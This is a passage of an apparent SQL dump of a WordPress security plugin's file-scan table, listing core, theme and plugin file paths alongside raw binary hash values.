Ld�-�','�-��]y|��\"c�n��$�q�0LL��c�@','',0,'?'),('�u78�¸�KԊkh�','wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?\"p6;�oZB?��6��','�}�SjȎwy��`��`��R=�*�ɒ�\"*g','',0,'?'),('�|�#�԰#�{����','wp-admin/js/link.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"1��6�����','z���;���LRK�`�jݰ�P\'�N�v\'','',0,'?'),('ډx`�9�LťM��,L','wp-includes/css/dist/block-editor/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g+a�pzLe*N��&�','���w\\}bXJ1)��]��~I5OS��K��:��','',0,'?'),('ڲj,.{�t�[��e�$','wp-content/themes/shootingstar/functions/about/images/support.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@4/Z�xr���I(]�','APX�@L�`��gwG��c0W�ŀ�}���c|b','',0,'?'),('ڵ�ͺt}���ɣ]','wp-includes/wp-includes/blocks/html/block.json',0,'�-�FV�y�o����','�-�FV�y�o����','���RA��A�ȧ/��r�4H�-@��(\n	�7R4�','',0,'?'),('�Š�#6�K%#f\r�','wp-includes/js/dist/vendor/wp-polyfill-element-closest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���H0�c;`���W&','2A]�ڛ\\e��WߦkZ�s���c�<�`�d)�','',0,'?'),('����C+�+��%J}','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-formdata.js',0,'�883������x��\r','�883������x��\r','��X�����r�q-��N)��nhl�L�$���','',0,'?'),('��J�B�&9:V�F[�','wp-includes/js/dist/media-utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A{���Z�o��','D�2����<02Ĭ��3������w;,�*�b�','',0,'?'),('���C�.yj\0o�*�f�','wp-content/plugins/wordfence/views/scanner/option-scan-signatures.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��o��JP�','�ǣ.�ڑ���m���Uǝ��az��l-pv','',0,'?'),('�!�(t��<Թ','wp-includes/js/heartbeat.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��_\r�JL�#�@B��','wp-admin/css/colors/midnight/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��|��\'\rȤ�@�\n','B��x.e��DP�0�����$\Z�D3��','',0,'?'),('� �I�_X�����?','wp-admin/js/gallery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z%�[�l�]ʕ����','���I�^�K��_�i��Gz��:5��n|�ߡL','',0,'?'),('�.��{���Gtj��=�{','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/dashicon-edit.png',0,'xR�	�Y�X���ݤ���','xR�	�Y�X���ݤ���','m���\Zc���ĭ��]���[��^�P��w','',0,'?'),('�4��6�1�m��Y�R','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nH\0�u�}� `����','���R�&�X��d�[��4���9��V�I','',0,'?'),('�Ot��\rVe��z�.','wp-includes/wp-includes/js/jquery/ui/effect-drop.min.js',0,'�[/�Zo[�Ǵ��/.','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�v6^A��A/],6\'y:','wp-admin/css/site-health.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��{�x�y6roc�','ɬ�v��O�܋)%���\0���|М���O�','',0,'?'),('ۋ{S0\0\0=�1_ئ\r�5','wp-includes/js/dist/priority-queue.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g��FC	���z[�0','�s�՛ �e��\"i�0\'\0^ٜ7k�I�]���','',0,'?'),('ۖJ�Bw�C��|M�v','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5VzY�]�#yR��Jݮ','Y�M�\"z)tϖ���*c�wL\0�����1w$d��','',0,'?'),('۪��	.�ո�\\���','wp-includes/js/tinymce/skins/wordpress/wp-content.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����`��Un\0\r��','>���@�:so���X�=��Kd��ku�{�','',0,'?'),('��r�����؁=�Ԓ�','wp-includes/images/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[�(�.��*NZ�','j�(-9��_��E-#�we�$�]o�01��u','',0,'?'),('��0�/|�h�����s�','wp-content/themes/sg-window/inc/widget-items-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K��{�>��g�J','�9N#�\\ڨ6���N�s�Ę���H��sM�~','',0,'?'),('��\np���Gnu:���','wp-includes/js/colorpicker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��V g�����-�','�V�w��%�%�:�3CQ#+g��	��e�}�','',0,'?'),('��:�ҝ\Zdm���*v','wp-content/plugins/wp-cerber/assets/flags/ie.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�Ht�`��Mˉ.2*','��H�X�� �\Z�۴�n��\0y��n��n','',0,'?'),('�F���\ru�D�b7','wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m�E���}8ןb�,','dh��nC���[�$���P7�xH\"8�i\Z*�','',0,'?'),('�ȼ�؟�\'\r`����','wp-includes/feed-rdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xG�7�%���\0b���','p=m=G�l�h�nh��V��]�-�+�1�a','',0,'?'),('�1���<LOG��S�\r','wp-includes/wp-includes/class-wp-block-type-registry.php',0,'rR�M8��u<�V�l��','rR�M8��u<�V�l��','�\Z�7�Q\0����O�C�\r.�D�\0n*���','',0,'?'),('�2G�?�_�\\��-B','wp-includes/canonical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��G��o<����ݏ�','����1\r�eɓ�������Y宒^zՒ=�F�1','',0,'?'),('�M\\-D�kf����','wp-content/plugins/wp-cerber/assets/flags/kw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�p8V��$vL\r�Y]�','&�\\m0���Iz{<�>��|���\'����L','',0,'?'),('�}m�m;I}ݽ:�e\0��','wp-content/themes/shootingstar/functions/about/images/doc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڧ�^Ns�h�l��','��a�/Y�m��n��W����0B��','',0,'?'),('ܑK�ݓ���%eP�^U','wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T&����#i�]�<{','EPmh>*H�S��8�S�F��pXbdU8����','',0,'?'),('ܥ�[kmy}�QEާ','wp-content/themes/sg-window/img/icons/small/youtube.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\ .�s��E��B>�','�K-{��H ����[u�Ӛ���w�Q�3_�','',0,'?'),('ܷ\n9*om��L6�>~�','wp-includes/wp-includes/ID3/module.audio.flac.php',0,'��-�ל�/f��T�@','��-�ל�/f��T�@','�_d�s�`C�Ro\Z-��Y/�X{��Bƛ�,O�','',0,'?'),('���.�U�	��Y��=','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/byte_safe_strings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h���`����V�Af','<�\\�G��;1#��k�L��à��(փ','',0,'?'),('��Tо�R���\'�{','wp-content/plugins/wordfence/lib/wfPersistenceController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%��ky���i�MO*','����X(�30\r\n��\nPE�̠�� �9��','',0,'?'),('��}o�c����j\0��','wp-includes/wp-includes/pluggable.php',0,'�pq�����EyJ�$��','�pq�����EyJ�$��','�Y�֋Y\0+IBNvk�dE&��Bp����F�','',0,'?'),('�ޒЌ=��ߕ0$�:(','wp-includes/wp-includes/images/arrow-pointer-blue.png',0,'w��b�·*L���[��','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('��ջZml��4�ˮU','wp-includes/images/smilies/simple-smile.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��{…��f�w�h','�?Y�ag\\�<y����0\01��8�3��H�g','',0,'?'),('��\r\0FJ��B��e�','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�����G1��','[�d�뿪�a��o�Ϸ�8|[��U׎��u�(','',0,'?'),('�׵(���K�B��','wp-includes/js/codemirror/fakejshint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�v�,ROlx]J\')K','��-�6�$$�;���}ptO�4]2��ТR�5֡','',0,'?'),('���J�8��)�Qz�_�','wp-includes/wp-includes/js/wp-list-revisions.min.js',0,'���}�\Z�ۦ_��8K','���}�\Z�ۦ_��8K',']\r��o�8�Y�6��)ryW?�Y�����b�z(','',0,'?'),('�)�ވ.sچ�4����','wp-content/themes/sg-window/img/icons/facebook.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7U��0O֑7�^��|','8�I��T�h.;��\r1�����N���Yٟ5','',0,'?'),('�J0���j�Yg�h�','wp-includes/js/tinymce/plugins/lists/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�8��:s��w�9�J��',')b�#4�e��*�9(��=�QE�e0|1���\n�','',0,'?'),('�[6�5��+�	�n9�','wp-admin/images/sort.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������*� ����3','vP���-~�x��O\"	�����;��','',0,'?'),('�f��y���ħ�*!','wp-admin/js/nav-menu.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��B�)=�\'d�G�','d6��H�W�F�8!�y�NA���2��\'`@�','',0,'?'),('݋��XtK�;@\\�r�','wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php',0,'� ��9-��K���9,�','� ��9-��K���9,�','�断8�Z��.8�g�Kl�2��&.M��O�','',0,'?'),('ݖ�\'�\"|3�_�t|��','wp-includes/class-wp-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Q5��ׄXZ��','�}Gj)p�����O�7�٠fݒ���ፎ�Y�p','',0,'?'),('��\'��|?��>��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���L��aDJ�?��Z��','����=F=�=�<��_%�=��M?�����u/','',0,'?'),('�\n�L��)�t�#].u�','wp-content/themes/shootingstar/images/pattern.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%����j�a�)�Tq','ϊB�M�p�.h�n��%��|�ɧ��','',0,'?'),('�γHw�n�)f =q','wp-includes/wp-includes/css/admin-bar.css',0,'�p�t_K��ᕮ��','�p�t_K��ᕮ��','�ذ�ǶQF�bA\"��G+c��i��1 /�wǧ�&','',0,'?'),('�HC������)�C�','wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��y��K��\n�u�@�x','Aݶ�݁;_|s�Ȥ4��_�)z�aK�Q�Ee!��','',0,'?'),('��u�m�mL�jsL/�','wp-content/plugins/wp-cerber/cerber-ripe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�a���G�5.L��','�BA�i���B�\rD�y.��_�Ώ%)�X�h�\Z�','',0,'?'),('�p�խ^�@#�Ԓ','wp-content/plugins/wordfence/views/scanner/scan-progress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�1{�	@�m�90','�K��M$���)�+SCQF�1qZ�Tv`�r','',0,'?'),('� Ϧ0#TF�sۂ���t','wp-includes/wp-includes/class-wp-block-patterns-registry.php',0,'�O�>�O^��\"����','�O�>�O^��\"����','͊�Y��V�y���}��&m�{�5jJ)0�!','',0,'?'),('�3^��PM�Y���H�D�','wp-includes/js/tinymce/skins/wordpress/images/video.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�¶��B�=\rz��3j�','���i���I/=�M�MX�:M�A�pv�\r�','',0,'?'),('�5f�����oޮ�','wp-admin/includes/class-wp-privacy-policy-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ã��6�rRӆ��',':����֎�,J-1�3��B\ZU.��g','',0,'?'),('�N�\\�|�`*�,)@4','wp-includes/images/xit-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ӂ�u:@4\r���z<5�','�S\r�}@�~Q�:�Sc����*d+�Z�_�{�R','',0,'?'),('�d�!ܭ$��5\'�d�','wp-includes/wp-includes/js/dist/viewport.js',0,'��ߙ��,���B�','��ߙ��,���B�','H9����Y߈�݆��3L ��c���Jگ	=�','',0,'?'),('�s[I-�O��_M�]�','wp-includes/wp-includes/images/smilies/icon_wink.gif',0,'e?2���i����','e?2���i����','�(���V��{�V�Bk����o(`Z��V	6','',0,'?'),('ޒ�?I�Ωi%��g�y�','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�h<x�Ο�=9��','�����Q�zE���\'?H)ky��a\Z�>Bч�','',0,'?'),('ޝ~�QB��>%?�q�','wp-includes/wp-includes/css/dist/block-library/theme.min.css',0,'q��/���c�','q��/���c�','�8�OG�I%��(�n6�)�lhf6f��','',0,'?'),('ު� 5ʲ~Pƹì�','wp-includes/wp-includes/SimplePie/Cache/Memcache.php',0,'���u���5uyS��','���u���5uyS��','�/��M�[�Qt�n.?χIqA?Tj<��woRI','',0,'?'),('�ދ���1F���a�','wp-content/plugins/wordfence/lib/wfArray.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'Fbaۆ�ₑ�1ʤ/','��n2q��8D��-�AR�>�xqYq���$� ш','',0,'?'),('��\'g!�:�H��),�','wp-includes/SimplePie/XML/Declaration/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O,@�ۺ�a�	Δ��','��im�Q�q+��\r��:�Po����\Z*�����','',0,'?'),('���\"�����c)j�\"','wp-includes/js/wplink.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��`��̶�Vu��m��','Ե*&n�����_��f\nz\r*���3I�I;C›�','',0,'?'),('�-�(l�hD>�Lνd','wp-includes/wp-includes/class-wp-matchesmapregex.php',0,'��Q���d̚w$<龦q','��Q���d̚w$<龦q','9�l�~�>S5]8�ٺ�ɞ���FiJ�����Z','',0,'?'),('�/��i�Zج �[?�*�','wp-content/plugins/wp-cerber/assets/multi/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u���E.0�Ȁ��b[�','�]=2�����F���(Cҷ\Zc�93Є�K@','',0,'?'),('�6��\'���3��ݔ','wp-includes/wp-includes/widgets/class-wp-widget-media-gallery.php',0,'7_^\\fS�ɉ�]6n#\Z','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('�=@\\�JpQ�m\\��6','wp-admin/includes/class-wp-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M$=�8�:����Az�n','%L���ð�@C�Ub��t�����n���c\Z�d','',0,'?'),('�L#�����a���W �','wp-includes/rest-api/endpoints/class-wp-rest-revisions-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���DBSq&a��_�%','�2��C���Zh+�̴���\'�H��p�H�r','',0,'?'),('�bz�/���T�7aHy','wp-includes/js/mediaelement/mejs-controls.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^yq+�S%��y','������h���A3L�:��\'1�ꁠ�\\�','',0,'?'),('�q����%ű� m+','wp-admin/css/colors/light/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\07Α�L��b�HgO�','5���m���%!��au�l�qRk{qn�ia�0','',0,'?'),('�r�±�2�\"}�	�,�7','wp-content/plugins/wp-cerber/assets/flags/nl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��K��+Z59����)|','/��\ns��!�-���?k���>��yU� �','',0,'?'),('ߌ��(������2���','wp-includes/js/quicktags.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�w.PX�Mɇs�K!','_1��T��)��U�k�`{��,�;�k��o�','',0,'?'),('ߑ�-��\r�Ϸ΄�.�','wp-includes/wp-includes/js/tinymce/themes/modern/theme.min.js',0,'U���E��|�h(Zf�','U���E��|�h(Zf�','ӣ	}�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),('ߔ������H�u�&�','wp-includes/js/plupload/plupload.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݠ�$pZR�>\'�|�','�\"����8[J%�.�˚�c�V\r\rE��)\'','',0,'?'),('ߕQ��@��,���3I','wp-includes/wp-includes/images/smilies/icon_lol.gif',0,'n����:ѷ&����(�','n����:ѷ&����(�','�l�1�Hq�.�2�x��󢾉$�Y�\Z8�','',0,'?'),('ߗ�H4�[�w�Q@','wp-includes/wp-includes/class-IXR.php',0,'��0���C`q�x�','��0���C`q�x�',']���z�p��q�N\"CKW��鴛��c��M','',0,'?'),('ߗ�Q��u�!ٶx�[','wp-includes/js/wpdialog.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=nR�-��KP��=��<','w���ڇEÞ����\0�v�ӭ��k^�M�n','',0,'?'),('߮�=?�p�׺�����v','wp-content/themes/sg-window/single-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӗ93Cy��+�O','�$��1��K��4� v�ls�:��9�%L?��','',0,'?'),('߰S����h[�۳�','wp-includes/class-wp-http-streams.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oo�֪$N�~�F0�ۂ','��d�	*ȩ�X���J�z9<��)�>�ԃtj','',0,'?'),('ߴ�S8��AТ','wp-includes/js/jquery/ui/autocomplete.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':dL�*�E�&*!','��`��Or\r�8;P[Q�=�;����ܣj','',0,'?'),('߶>�D[�vQi�4`��k','wp-includes/wp-includes/images/smilies/icon_question.gif',0,'��[-\0�\'��W��F','��[-\0�\'��W��F','�7b��|6#����9/?x��~��[��%t','',0,'?'),('߹V�=���\"�#n�	�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�-�T�\0�2�L-�','�ȴ����g�A�]�z-ۣ��᷸[�','',0,'?'),('�ĵ>��#B��b���','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ۓ���G�c,��=c^�','�����G�c����t(5\n,9%�����)�e','',0,'?'),('�Ȧ0� $�7O>���','wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�C�Ǻ\Z��.��զ','ڟXZfd�ޱEd4�z%��×\0cKc�J�l^','',0,'?'),('��Yv�z�֗*�9��a','wp-includes/js/jquery/ui/tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&�<Q�1}�������','�M@�jM�m��\\����`T@�.���Rl.��','',0,'?'),('��5��O}P�=�NU�p','wp-includes/wp-includes/class-wp-customize-control.php',0,'���(���H�g1k!~','���(���H�g1k!~','Գh(��m7B��.�oǏu��ʼ%a��1ʾ�','',0,'?'),('����4���\Za���','wp-includes/wp-includes/class-feed.php',0,'���>�y�ܫ��]��T','���>�y�ܫ��]��T','�8��j2�y�N!qʩp�����t\0A��2\\Y','',0,'?'),('��&��=N��u�#y','wp-content/plugins/wp-cerber/assets/flags/bw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A�]G��G�9�P','#�O�mT>O���://c/Pu�$0�����','',0,'?'),('�%�f\\+,���\0\\Y','wp-admin/includes/class-wp-filesystem-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O��r�݇o��','�Yb�eA\'�#�đÎؚ��[9��=-&S�TT�','',0,'?'),('�*����\'Kj��̰!c','wp-content/plugins/wordfence/waf/pomo/plural-forms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P!�7G�NJ�q`.','.��\n)[.��c�f��\r�\rF��Z�k����','',0,'?'),('�Dv���KB���U4\n','wp-includes/wp-includes/css/dist/format-library/style.min.css',0,'�t���A8�x��l�','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ��	\0y','',0,'?'),('�\\1݃�%�VE|<N��','wp-content/plugins/wordfence/modules/login-security/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�����m𙗣P�','j*�e����doX�~�7��&���N�9�|L���','',0,'?'),('�t}\\[����d�','wp-includes/wp-includes/js/plupload/moxie.min.js',0,'�|A��09��K�:���','�|A��09��K�:���','��[\n��Y�@sZ�F�Ul�+�Έ�f���Ǩ\0','',0,'?'),('��&�V*o�����)�','wp-content/themes/sg-window/sidebar-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�5�\n�w�7�f�','H�wBbE���w9\\�H�J\"�!�V�� ķ�=','',0,'?'),('�i���4��Zl�Ѓ @','wp-includes/css/dist/block-editor/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� 6]������(','X��L*��7ݬ��*����?�@w��\\c','',0,'?'),('��r��M�ܴ-\nS��','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eR��r�#�U���犏','���s�Gd��l�IB-?`7|r�R��3����V','',0,'?'),('����o��ʠ���','wp-includes/wp-includes/images/rss-2x.png',0,'�Ya[�Q���rj�','�Ya[�Q���rj�','yS0�c`\n7��as��#�n��Y���','',0,'?'),('���ba;������J=�','wp-content/themes/sg-window/archive-jetpack-portfolio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ҷ�\0�d)��','�E�x�V��62��r�1���\\��g��!','',0,'?'),('��\Z�$]�W��wP�l','wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���l�We�U{�9�','������G����8�=�\0�> �3�wg3.�4','',0,'?'),('��^��bR��SI�!�?','wp-includes/class-wp-image-editor-imagick.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�U��--��	�2��6','\0\\��0*���%Qݯ�O��^��8��G�z','',0,'?'),('����sk�6/��н�','wp-content/plugins/wordfence/lib/wfSupportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!eZu\0z�[�O��O��<','�Q:4s-¦�\n��y���}�x�z���5�','',0,'?'),('�@��M]\"���iNJ','wp-includes/class-wp-http-requests-hooks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('�Rs�2�չ���=','wp-content/plugins/wp-cerber/admin/cerber-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�pz$]��?﫶gj�','��������<��^�M�v��5�Ò����j','',0,'?'),('�Z���(>(�1bޫ�Z�','wp-includes/js/tinymce/skins/lightgray/content.inline.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�lo7�r79wA�U�E','���E���P���[���x�v1i0�h;����^J','',0,'?'),('�\\�����$�I�H��','wp-includes/js/jquery/jquery.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��	3i��7�L�1�<','�s��)=\'�5r����l�}�<�(v\'ܘl�x\Z','',0,'?'),('�e����:֬p6�','wp-includes/js/dist/vendor/wp-polyfill.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7E�~?V�֬��o�B','b1�r�������J�w���./2�M��`','',0,'?'),('�q�@/��ꦑٞ-M�','wp-admin/network/site-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�?:Ĉ�-�żѐ\\x)p','�2�-�X����)��\rP�����bV�ҝb)sV','',0,'?'),('�*z1�OR���B�','wp-includes/wp-includes/js/tinymce/plugins/compat3x/css/dialog.css',0,'�wyB���o�|��','�wyB���o�|��','��o��Jj$��sc��R��Q��c��伍F��','',0,'?'),('ᕵ7\\F�|�[E����l','wp-includes/sodium_compat/src/Core/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?���Dq�\Zl܋]�','���%SC���xzg�Y3����$����)\'��\"','',0,'?'),('�>“���\n�5����Z','wp-includes/customize/class-wp-customize-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�f��	˥�^�К','�\nu��8�\rYY��:\nVk���.aG��GoM','',0,'?'),('���lS$c�N�gh*','wp-includes/wp-includes/rest-api/class-wp-rest-request.php',0,'��)0\0�����l3','��)0\0�����l3','oēՆ��^�!\0De�x��%�.2��E6]R|','',0,'?'),('�;�Dth�E�G�>�H�','wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����o�����\\�','��Zm�$z��p�uC��VgIgI���N�','',0,'?'),('�8�C\0ko��	����','wp-includes/wp-includes/js/jquery/ui/controlgroup.js',0,'/�mU��K\ZNP�*{�','/�mU��K\ZNP�*{�','(�\Z�V]MgZ�\ZR�ˆF�̄{��(���Y2]','',0,'?'),('���m|�yb����','wp-includes/class-wp-recovery-mode-email-service.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� ��Gu�n���Et','Y�ѾLP����=NL������*Π�T9�I�(','',0,'?'),('�ҕ��%�n�d�h��I','wp-includes/wp-includes/js/dist/block-serialization-default-parser.js',0,'4��ņ��%ٔ2����','4��ņ��%ٔ2����','����H��l�Eb?�y̥l�N��+��6x�3m','',0,'?'),('��\\9ã>���Iz4�c','wp-includes/js/tinymce/plugins/hr/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k+%�5l3�!-��','�2`���Ri�L��#e؄�4�6�g�p�o~�','',0,'?'),('�BK���A�a<�l2','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/Ge/P2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Xߓ�Œ\"X3�6DQ�','!�l.�.��GI�\n7oe�ѿ�\';I�\n\n���','',0,'?'),('����\nº�N���','wp-includes/wp-includes/js/imgareaselect/border-anim-h.gif',0,'Z��,�ntZ^6�{Lp�4','Z��,�ntZ^6�{Lp�4','qs�c��h���m-�%�x�\ZB��x�\'��E:','',0,'?'),('�\\v��)�w�!����','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/buttons/icons/cross.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BI&��CV�4�N��','�ti�/V!l���^)2ež	�U�U�A\0rH+','',0,'?'),('�L�>�ٟ�#{6p}Y��','wp-admin/options-writing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ì�,{J�>M*\ZY��3','�������C�I�T��H&3��8�̞n�','',0,'?'),('�N�F�u�N��z���','wp-includes/wp-includes/SimplePie/Restriction.php',0,'[\"��~\'���$|2*�','[\"��~\'���$|2*�','�>�3�	vj��\r|\")\"�5SR�\0�{k����{6','',0,'?'),('�U6υs�d�~x���','wp-includes/sodium_compat/src/Core32/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*�un�rdu�g���','�ҷ<h�bo�>�W��\Z�N��� e��ia�','',0,'?'),('�^}R	�V7{WI\rH','wp-includes/blocks/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','էL\n�8���{s���','x�\Z�R�>ؼ�:�@3�W@f�e�f����L�','',0,'?'),('�y�0H�#;�e\n\"�+','wp-includes/js/dist/server-side-render.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���^=*Ƕ8���ؚ�','\\�(ִ\n�%y�F�1���=y��	�8�@	\"�a�','',0,'?'),('�	���.��%���(<','wp-includes/wp-includes/images/smilies/icon_redface.gif',0,'����U���E����','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('��Za9�U�z��ն','wp-includes/class-wp-date-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3�U��	�L]-�Rs�@�','ֲP4]���!	